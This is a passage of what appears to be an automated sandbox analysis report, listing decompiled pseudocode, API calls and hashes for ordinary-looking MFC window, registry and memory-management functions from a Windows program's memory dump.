						E00401E60( &(_v24[0xfffffffffffffff0]), _t91);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E00401E60( &(_v16[0xfffffffffffffff0]), _t91);
						goto L12;
					} else {
						_push(_t100);
						_push(_t78);
						_t36 =  &_v280; // 0x44e938
						_v280 = 0x44e9d0;
						E00429326(_t36, 0x448990);
						asm("int3");
						_t73 = _t78;
						 *((intOrPtr*)(_t73 + 4)) = 1;
						return _t73;
					}
				}
			}

0x0040d902
0x0040d902
0x0040d902
0x0040d909
0x0040d90d
0x0040d914
0x0040d91a
0x0040d921
0x0040d928
0x0040d92a
0x0040d92d
0x0040d930
0x0040d937
0x0040d93a
0x0040d93c
0x0040d93c
0x0040d93f
0x0040d940
0x0040d942
0x0040d949
0x0040d94b
0x0040d952
0x0040d954
0x0040d954
0x0040d957
0x0040d93c
0x0040d95f
0x0040da3c
0x0040da42
0x0040da4a
0x0040da4b
0x0040da4c
0x0040da55
0x0040da5a
0x0040da61
0x0040d965
0x0040d96f
0x0040d97e
0x0040d989
0x0040d98c
0x0040d991
0x0040d999
0x0040d99d
0x0040d99e
0x0040d9a3
0x0040d9a6
0x0040d9aa
0x0040d9ae
0x0040d9af
0x0040d9bd
0x0040d9c1
0x0040d9c9
0x0040d9cf
0x0040d9d0
0x0040d9dd
0x0040d9e3
0x0040d9e5
0x0040d9fa
0x0040d9ff
0x0040da04
0x0040da05
0x0040da06
0x0040da06
0x0040da0e
0x0040da0e
0x0040da20
0x0040da2c
0x0040da34
0x0040da37
0x00000000
0x0040d971
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b
0x0040d96f

APIs

__EH_prolog3.LIBCMT ref: 0040D921
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040D9DD
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 0040D9F4
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 0040DA0E
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 0040DA20

Strings

Software\, xrefs: 0040D976

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 8fa51ae453399f767d1ff25cc4831ad069edc7689dda660ed02f68c8ac803ef6
Instruction ID: eca8862fe7a70fdf76533bd803f628b6a1364c9e388db0c8905a4c44f944f400
Opcode Fuzzy Hash: 8fa51ae453399f767d1ff25cc4831ad069edc7689dda660ed02f68c8ac803ef6
Instruction Fuzzy Hash: 88415971D00109ABCB11EBA5DC41AFEB7B9EF48318F10053AF551F22D1DB789A49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004109D8, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004109D8(intOrPtr* __ecx, void* __edx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				int _t53;
				long _t56;
				signed int _t62;
				void* _t68;
				intOrPtr* _t70;
				void* _t71;

				_t68 = __edx;
				_t62 = 1;
				_t70 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E00415985(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t70 + 0x20));
				 *(_t70 + 0x3c) =  *(_t70 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E0040D091(0);
				_t71 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t76 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E0040D4B8(_t68, 0, _t70, _t76);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E00415A53(_t70, 1);
									UpdateWindow( *(_t70 + 0x20));
									_t62 = 0;
								}
							}
							_t48 =  *((intOrPtr*)( *_t70 + 0x80))();
							_t82 = _t48;
							if(_t48 == 0) {
								_t39 = _t70 + 0x3c;
								 *_t39 =  *(_t70 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t70 + 0x44));
							} else {
								if(E0040D3D2(_t62, 0, _t70, _t71, _t82, _v8) != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E0040A85C();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						E00415A53(_t70, 1);
						UpdateWindow( *(_t70 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t70 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t70 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x004109d8
0x004109e1
0x004109e9
0x004109eb
0x004109ef
0x004109f3
0x00410a01
0x00410a01
0x00410a06
0x00410a0c
0x00410a10
0x00410a14
0x00410a19
0x00410a1f
0x00410a97
0x00410a97
0x00410a97
0x00410a9b
0x00000000
0x00000000
0x00410a33
0x00410a35
0x00410a9d
0x00410a9d
0x00410a9d
0x00410aa4
0x00000000
0x00000000
0x00410aa8
0x00410aae
0x00410ab6
0x00410ac3
0x00410acb
0x00410acd
0x00410acd
0x00410ab6
0x00410ad3
0x00410ad9
0x00410adb
0x00410b16
0x00410b16
0x00410b16
0x00000000
0x00410add
0x00410ae9
0x00410aeb
0x00410af3
0x00410af3
0x00410b07
0x00000000
0x00410b09
0x00000000
0x00410b09
0x00410b07
0x00410adb
0x00410b0b
0x00410b0c
0x00000000
0x00410b11
0x00410a37
0x00410a39
0x00410a3f
0x00410a47
0x00410a49
0x00410a49
0x00410a49
0x00410a4b
0x00410a50
0x00410a52
0x00410a56
0x00410a58
0x00410a5c
0x00410a6b
0x00410a6b
0x00410a5c
0x00410a56
0x00410a71
0x00410a76
0x00410a93
0x00410a93
0x00000000
0x00410a78
0x00410a85
0x00410a8b
0x00410a8f
0x00410a91
0x00000000
0x00000000
0x00000000
0x00410a91
0x00410a76
0x00000000

APIs

GetParent.USER32(?), ref: 00410A06
PeekMessageA.USER32 ref: 00410A2D
UpdateWindow.USER32(?), ref: 00410A47
SendMessageA.USER32(?,00000121,00000000,?), ref: 00410A6B
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 00410A85
UpdateWindow.USER32(?), ref: 00410ACB
PeekMessageA.USER32 ref: 00410AFF

Part of subcall function 00415985: GetWindowLongA.USER32 ref: 00415990

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 239dfc537d2c71071682d00c4205c3eed67dc0c5750460e42d16bef052ca46b4
Instruction ID: e52ed32a603a333b8822f58d9dc957422d84ccd9afbe44cb2a13564fd1e6091b
Opcode Fuzzy Hash: 239dfc537d2c71071682d00c4205c3eed67dc0c5750460e42d16bef052ca46b4
Instruction Fuzzy Hash: 8041C0306043419BC721DF66DC44AABBEF4FFE4B98F04492EF48191261C7BA98C4CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A40F, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A40F(long __ecx) {
				long _v4;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				long _t19;
				long _t20;
				struct HWND__* _t21;
				long _t22;
				struct HWND__* _t23;
				long _t24;
				struct HWND__* _t25;
				long _t29;
				void* _t30;
				void* _t33;
				long _t38;
				void* _t41;
				void* _t44;
				struct HWND__* _t45;
				struct HWND__* _t47;
				struct HWND__* _t48;
				long _t50;
				long _t52;

				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0x78));
				if(_t16 == 0) {
					_t50 = E0040A3FC();
					__eflags = _t50;
					if(_t50 != 0) {
						_t19 =  *((intOrPtr*)( *_t50 + 0x120))();
						__eflags = _t19;
						_t38 = _t50;
						_pop(_t51);
						if(_t19 != 0) {
							_t52 = _t38;
							_t20 =  *(_t52 + 0x64);
							__eflags = _t20;
							if(_t20 == 0) {
								_pop(_t51);
								goto L11;
							} else {
								__eflags = _t20 - 0x3f107;
								if(__eflags != 0) {
									_t30 = E0040E67F(_t33, _t44, _t52, __eflags);
									_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)))) + 0xac))( *(_t52 + 0x64), 1);
								}
								return _t20;
							}
						} else {
							L11:
							_push(_t38);
							_push(_t33);
							_push(0);
							_push(_t51);
							_push(_t44);
							_v4 = _t38;
							_t21 = GetCapture();
							while(1) {
								_t45 = _t21;
								__eflags = _t45;
								if(_t45 == 0) {
									break;
								}
								_t22 = SendMessageA(_t45, 0x365, 0, 0);
								__eflags = _t22;
								if(__eflags != 0) {
									L26:
									return _t22;
								} else {
									_t21 = E004120F3(0x365, _t41, _t45, __eflags, _t45);
									continue;
								}
								goto L32;
							}
							_t23 = GetFocus();
							while(1) {
								_t47 = _t23;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t22 = SendMessageA(_t47, 0x365, 0, 0);
								__eflags = _t22;
								if(__eflags != 0) {
									goto L26;
								} else {
									_t23 = E004120F3(0x365, _t41, _t47, __eflags, _t47);
									continue;
								}
								goto L32;
							}
							_t36 = _v4;
							_t24 = E00412138(_t36, _t41, _t47);
							__eflags = _t24;
							if(_t24 != 0) {
								_t25 = GetLastActivePopup( *(_t24 + 0x20));
								while(1) {
									_t48 = _t25;
									__eflags = _t48;
									_push(0);
									if(_t48 == 0) {
										break;
									}
									_t22 = SendMessageA(_t48, 0x365, 0, ??);
									__eflags = _t22;
									if(__eflags == 0) {
										_t25 = E004120F3(0x365, _t41, _t48, __eflags, _t48);
										continue;
									}
									goto L26;
								}
								_t22 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L26;
							} else {
								goto L9;
							}
						}
					} else {
						L9:
						_push(0);
						_push(_t36);
						_t4 =  &_v28; // 0x44e938
						_v28 = 0x44e9d0;
						E00429326(_t4, 0x448990);
						asm("int3");
						_t29 = _t36;
						 *((intOrPtr*)(_t29 + 4)) = 1;
						return _t29;
					}
				} else {
					if(_t16 != 0x3f107) {
						_push(1);
						_push(_t16);
						return  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xac))();
					}
					return _t16;
				}
				L32:
			}

0x0040a40f
0x0040a40f
0x0040a414
0x0040a42f
0x0040a431
0x0040a433
0x0040a43e
0x0040a444
0x0040a446
0x0040a448
0x0040a449
0x00416923
0x00416925
0x00416928
0x0041692a
0x0041694c
0x00000000
0x0041692c
0x0041692c
0x00416931
0x00416933
0x00416944
0x00416944
0x0041694b
0x0041694b
0x0040a44b
0x00416884
0x00416884
0x00416885
0x00416886
0x00416887
0x00416888
0x00416889
0x0041688d
0x004168b2
0x004168b2
0x004168b4
0x004168b6
0x00000000
0x00000000
0x004168a6
0x004168a8
0x004168aa
0x0041691c
0x00416921
0x004168ac
0x004168ad
0x00000000
0x004168ad
0x00000000
0x004168aa
0x004168b8
0x004168d0
0x004168d0
0x004168d2
0x004168d4
0x00000000
0x00000000
0x004168c4
0x004168c6
0x004168c8
0x00000000
0x004168ca
0x004168cb
0x00000000
0x004168cb
0x00000000
0x004168c8
0x004168d6
0x004168da
0x004168df
0x004168e1
0x004168eb
0x00416902
0x00416902
0x00416904
0x00416906
0x00416907
0x00000000
0x00000000
0x004168f6
0x004168f8
0x004168fa
0x004168fd
0x00000000
0x004168fd
0x00000000
0x004168fa
0x0041691a
0x00000000
0x004168e3
0x00000000
0x004168e3
0x004168e1
0x0040a435
0x00415838
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b
0x0040a416
0x0040a41b
0x0040a41f
0x0040a421
0x00000000
0x0040a422
0x0040a428
0x0040a428
0x00000000

APIs

GetCapture.USER32 ref: 0041688D
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 004168A6
GetFocus.USER32 ref: 004168B8
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 004168C4
GetLastActivePopup.USER32(?), ref: 004168EB
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 004168F6
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0041691A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 378dcf6b78cd22f86acea8413c6056b380a06c6747d96687815af1eca11bacf4
Instruction ID: 5c2dc0a00ed5add7f97a7725997a504b21b63c5aa54729abf883310924c53915
Opcode Fuzzy Hash: 378dcf6b78cd22f86acea8413c6056b380a06c6747d96687815af1eca11bacf4
Instruction Fuzzy Hash: 55313471705214EBCA217B25DC44EFF7A9CEB85794B12443BF401D3251CB7ADC8296AA

Uniqueness

Uniqueness Score: -1.00%

Function 00410F70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410F70(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E0040D088();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0040E6B2(1, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E004277B0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E00410D9E(_t61, _t72, GetWindowLongA, _t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E00410EBC(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x00410f79
0x00410f80
0x00410f86
0x00410f8b
0x00410fb0
0x00410fb0
0x00410fb6
0x00410fb8
0x00410fb8
0x00410fb6
0x00410fbb
0x00410fc0
0x00410fc4
0x00410fc7
0x00410fc7
0x00410fca
0x00410fd2
0x00410fd7
0x00410fd7
0x00410fda
0x00410fde
0x00410fe1
0x00410fe8
0x00410fed
0x00410fef
0x00410ff3
0x00410ffd
0x00411002
0x00411008
0x0041100b
0x0041101c
0x00411023
0x00411026
0x00411026
0x00410ff3
0x00410fed
0x0041103c
0x0041103e
0x0041104d
0x00411059
0x0041105d
0x00411065
0x00411065
0x0041105d
0x0041106d
0x00411080

APIs

_memset.LIBCMT ref: 00410FFD
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00411026
GetWindowLongA.USER32 ref: 00411038
GetWindowLongA.USER32 ref: 00411049
SetWindowLongA.USER32 ref: 00411065

Strings

(, xrefs: 0041101C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 888d9f2d809782b9b02c8a71c4b322c8d455601fec8cf5b19a4fae9d80d48969
Instruction ID: ae21f0f8cb27eb3f74017b3a887ea3b18e191f315cd179c620a4cf385084f0aa
Opcode Fuzzy Hash: 888d9f2d809782b9b02c8a71c4b322c8d455601fec8cf5b19a4fae9d80d48969
Instruction Fuzzy Hash: 1031B231A007119FCB20AFB5D885AAABBE4BF08314F14052EF58197791DBB9E885CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F59A, Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041F59A(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E00410E42(_t36, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E00415A74(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E0041F59A(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E00410E42(__ebx, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E0041F545(_t45, E00410E42(_t36, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E00410E42(_t36, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E00410E42(_t36, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

0x0041f59a
0x0041f59a
0x0041f59c
0x0041f5a3
0x0041f643
0x0041f647
0x0041f656
0x0041f65a
0x0041f605
0x0041f615
0x0041f66c
0x00000000
0x0041f66c
0x0041f617
0x0041f618
0x0041f61f
0x0041f631
0x0041f660
0x0041f660
0x0041f661
0x0041f663
0x00000000
0x0041f663
0x0041f633
0x0041f63c
0x00000000
0x00000000
0x00000000
0x0041f63e
0x0041f63e
0x0041f63e
0x0041f63f
0x0041f640
0x0041f664
0x0041f669
0x00000000
0x0041f66b
0x0041f61f
0x00000000
0x0041f65c
0x0041f5b8
0x0041f5bd
0x0041f5f1
0x0041f5d9
0x0041f5dd
0x00000000
0x0041f5e3
0x0041f5ec
0x00000000
0x0041f5ec
0x0041f5dd
0x0041f603
0x00000000

APIs

GetWindow.USER32(?,00000002), ref: 0041F5B5
GetParent.USER32(?), ref: 0041F5C6
GetWindow.USER32(?,00000002), ref: 0041F5E9
GetWindow.USER32(?,00000002), ref: 0041F5FB
GetWindowLongA.USER32 ref: 0041F60A
IsWindowVisible.USER32(?), ref: 0041F624
GetTopWindow.USER32(?), ref: 0041F64A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 78dc6faa9736ef45c17685ccc81277e86bc790b7bad95ceba6360fece9e43e69
Instruction ID: b8d643817d555e07fbd7c9f01348f0004d27e73c0f926a95db8431eb009d30a6
Opcode Fuzzy Hash: 78dc6faa9736ef45c17685ccc81277e86bc790b7bad95ceba6360fece9e43e69
Instruction Fuzzy Hash: 0721C432A007146BCB216A728C09FAB769CBF44754F05093EB945D7262DA2CDC8786AC

Uniqueness

Uniqueness Score: -1.00%

Function 00416952, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416952(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x0041696d
0x00416974
0x00416977
0x0041697a
0x0041697d
0x00416988
0x004169bf
0x004169bf
0x004169ca
0x004169cf
0x004169cf
0x004169d4
0x004169d9
0x004169d9
0x004169e2

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00416980
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004169A3
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004169BF
RegCloseKey.ADVAPI32(?), ref: 004169CF
RegCloseKey.ADVAPI32(?), ref: 004169D9

Strings

software, xrefs: 00416968

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 826d9bf6b305cbf8591db89f374ef59254a87598c0183f29f21c651c40511bd6
Instruction ID: 8af83a5621ab3a8301aa803fae370240e64b790bf5af92e5a959bc19d5bc2dfd
Opcode Fuzzy Hash: 826d9bf6b305cbf8591db89f374ef59254a87598c0183f29f21c651c40511bd6
Instruction Fuzzy Hash: 1811F8B6D00118FBCB21DB9ADD84CDFBFBCEF89704F1000AAA500A2121D7709A55DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417161, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00417161(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E00429326(0, 0);
				_t22 = E00405670(__edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E00415804(_t33);
				}
				 *(_t41 + 0xc) = _t23;
				E004277B0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E004272B2(_t28);
			}

0x00417161
0x00417161
0x00417168
0x00417172
0x0041717e
0x00417184
0x00417189
0x00417191
0x00417196
0x0041719c
0x0041719c
0x004171a4
0x004171b5
0x004171c1
0x004171c6
0x004171cc
0x004171cf
0x004171d4
0x004171de
0x004171de
0x004171e1
0x004171e7
0x004171f2

APIs

LeaveCriticalSection.KERNEL32(?), ref: 00417168
__CxxThrowException@8.LIBCMT ref: 00417172

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00429366

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000), ref: 00417189
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00417196

Part of subcall function 00415804: __CxxThrowException@8.LIBCMT ref: 00415818

_memset.LIBCMT ref: 004171B5
TlsSetValue.KERNEL32(?,00000000,00000000,765B253D), ref: 004171C6
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 004171E7

Memory Dump Source

